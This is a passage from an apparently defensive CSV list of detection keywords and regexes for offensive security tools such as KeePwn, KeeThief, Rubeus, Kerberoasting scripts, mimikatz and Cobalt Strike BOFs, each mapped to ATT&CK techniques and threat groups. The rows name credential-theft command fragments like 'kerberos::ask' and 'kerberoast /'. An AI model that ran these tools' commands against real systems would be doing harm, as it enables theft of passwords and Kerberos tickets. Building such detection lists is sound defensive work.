Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50277" "*KeePwn plugin add -u * -p * -d * -t *",".{0,1000}KeePwn\splugin\sadd\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}\s\-t\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50278" "*KeePwn plugin check -u *",".{0,1000}KeePwn\splugin\scheck\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50279" "*KeePwn trigger *",".{0,1000}KeePwn\strigger\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50280" "*KeePwn v* - by Julien BEDEL*",".{0,1000}KeePwn\sv.{0,1000}\s\-\sby\sJulien\sBEDEL.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50281" 
"*keepwn.__main__:main*",".{0,1000}keepwn\.__main__\:main.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50282" "*keepwn.core.*",".{0,1000}keepwn\.core\..{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50283" "*keepwn.core.parse_dump*",".{0,1000}keepwn\.core\.parse_dump.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50284" "*keepwn.core.plugin*",".{0,1000}keepwn\.core\.plugin.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50285" "*keepwn.core.search*",".{0,1000}keepwn\.core\.search.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50286" 
"*keepwn.core.trigger*",".{0,1000}keepwn\.core\.trigger.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50287" "*KeePwn.py *",".{0,1000}KeePwn\.py\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50288" "*keepwn.utils.*",".{0,1000}keepwn\.utils\..{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50289" "*KeePwn-main.zip*",".{0,1000}KeePwn\-main\.zip.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50290" "*KeeTheft/Dinvoke*",".{0,1000}KeeTheft\/Dinvoke.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","N/A","private github repo","10","","N/A","","","","50291" "*KeeThief*",".{0,1000}KeeThief.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from 
memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","50292" "*KeeThief.*",".{0,1000}KeeThief\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50293" "*KeeThief.ps1*",".{0,1000}KeeThief\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50294" 
"*KeeThiefSyscalls*",".{0,1000}KeeThiefSyscalls.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","N/A","private github repo","10","","N/A","","","","50295" "*keethief-syscalls*",".{0,1000}keethief\-syscalls.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","50296" "*keowu/BadRentdrv2*",".{0,1000}keowu\/BadRentdrv2.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","1","N/A","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","50298" "*KerbDump\*-Tickets-KerbDump.txt*",".{0,1000}KerbDump\\.{0,1000}\-Tickets\-KerbDump\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","50299" "*kerberoast /*",".{0,1000}kerberoast\s\/.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","50300" "*kerberoast /*",".{0,1000}kerberoast\s\/.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","50301" "*Kerberoast Attack - Services Configured With a Weak Password*",".{0,1000}Kerberoast\sAttack\s\-\sServices\sConfigured\sWith\sa\sWeak\sPassword.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","50302" "*Kerberoast -username *",".{0,1000}Kerberoast\s\-username\s.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","50303" "*Kerberoast(*",".{0,1000}Kerberoast\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","50304" "*kerberoast(self)*",".{0,1000}kerberoast\(self\).{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","50305" "*Kerberoast.*",".{0,1000}Kerberoast\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","50306" "*kerberoast.py*",".{0,1000}kerberoast\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","50307" "*Kerberoast.py*",".{0,1000}Kerberoast\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","50308" "*kerberoast.py*",".{0,1000}kerberoast\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","1","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","50309" "*kerberoast_attack*",".{0,1000}kerberoast_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50310" "*kerberoast_blind_output_*",".{0,1000}kerberoast_blind_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50311" "*kerberoast_john_results_*",".{0,1000}kerberoast_john_results_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50312" "*kerberoastables.txt*",".{0,1000}kerberoastables\.txt.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","N/A","5","442","63","2024-12-16T07:32:14Z","2021-08-02T20:19:35Z","50313" "*kerberoasting*",".{0,1000}kerberoasting.{0,1000}","offensive_tool_keyword","OSCP-Cheatsheets","kerberoasting keyword. 
attack that allows any domain user to request kerberos tickets from TGS that are encrypted with NTLM hash of the plaintext password of a domain user account that is used as a service account (i.e account used for running an IIS service) and crack them offline avoiding AD account lockouts.","T1558 - T1208 - T1003 - T1110","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tool","https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting.md","1","1","N/A","N/A","N/A","1","96","36","2019-09-09T22:07:47Z","2019-09-12T22:07:31Z","50314" "*kerberoasting.boo*",".{0,1000}kerberoasting\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","50315" "*kerberoasting.x64*",".{0,1000}kerberoasting\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus 
- Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50316" "*KerberOPSEC.csproj*",".{0,1000}KerberOPSEC\.csproj.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","50317" "*KerberOPSEC.exe*",".{0,1000}KerberOPSEC\.exe.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","50318" "*KerberOPSEC-x64.exe*",".{0,1000}KerberOPSEC\-x64\.exe.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","50319" "*KerberOPSEC-x86.exe*",".{0,1000}KerberOPSEC\-x86\.exe.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","50320" "*Kerberos abuse (kerbeus BOF)*",".{0,1000}Kerberos\sabuse\s\(kerbeus\sBOF\).{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50321" 
"*kerberos*.kirbi*",".{0,1000}kerberos.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","10","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","50322" "*kerberos/decryptor.py*",".{0,1000}kerberos\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black 
Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","50323" "*kerberos::ask*",".{0,1000}kerberos\:\:ask.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue 